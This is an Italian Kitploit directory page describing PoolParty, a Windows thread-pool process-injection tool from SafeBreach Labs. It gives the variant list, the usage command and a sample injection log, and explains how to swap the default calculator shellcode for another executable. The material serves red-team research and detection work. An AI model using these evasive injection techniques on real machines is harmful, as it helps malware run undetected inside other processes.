Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoolParty — Un insieme di tecniche di injection nei processi totalmente non rilevabili che abusano dei Windows Thread Pools. | Kitploit
Strumenti/GitHubGitHub/safebreach-labs/poolparty
Escalation di PrivilegiExploitShellcodePost-ExploitRed TeamingSviluppo Payload
GitHubsafebreach-labs/poolparty

PoolParty

Un insieme di tecniche di injection nei processi totalmente non rilevabili che abusano dei Windows Thread Pools.

Vedi Repository
1.3k17932 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoolParty

Una raccolta di tecniche di process injection completamente non rilevabili che abusano dei Thread Pool di Windows. Presentata ai Black Hat EU 2023 Briefings con il titolo - The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools

Varianti di PoolParty

ID VarianteDescrizione Variante
1Sovrascrivi la routine di avvio della worker factory target
2Inserisci un elemento di lavoro TP_WORK nel thread pool del processo target
3Inserisci un elemento di lavoro TP_WAIT nel thread pool del processo target
4Inserisci un elemento di lavoro TP_IO nel thread pool del processo target
5Inserisci un elemento di lavoro TP_ALPC nel thread pool del processo target
6Inserisci un elemento di lavoro TP_JOB nel thread pool del processo target
7Inserisci un elemento di lavoro TP_DIRECT nel thread pool del processo target
8Inserisci un elemento di lavoro TP_TIMER nel thread pool del processo target

Utilizzo

root@kitploit:~
PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

Esempi di Utilizzo

Inserisci un elemento di lavoro TP_TIMER nel processo con ID 1234

root@kitploit:~
>> PoolParty.exe -V 8 -P 1234

[info]    Starting PoolParty attack against process id: 1234
[info]    Retrieved handle to the target process: 00000000000000B8
[info]    Hijacked worker factory handle from the target process: 0000000000000058
[info]    Hijacked timer queue handle from the target process: 0000000000000054
[info]    Allocated shellcode memory in the target process: 00000281DBEF0000
[info]    Written shellcode to the target process
[info]    Retrieved target worker factory basic information
[info]    Created TP_TIMER structure associated with the shellcode
[info]    Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info]    Written the specially crafted TP_TIMER structure to the target process
[info]    Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info]    Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info]    PoolParty attack completed successfully

Shellcode Predefinito e Personalizzazione

Il shellcode predefinito lancia una calcolatrice tramite l'API WinExec.

Per personalizzare l'eseguibile da lanciare, modifica il percorso alla fine della variabile g_Shellcode presente nel file main.cpp.

Autore - Alon Leviev

  • LinkedIn - Alon Leviev
  • Twitter - @_0xDeku
Scarica lo strumento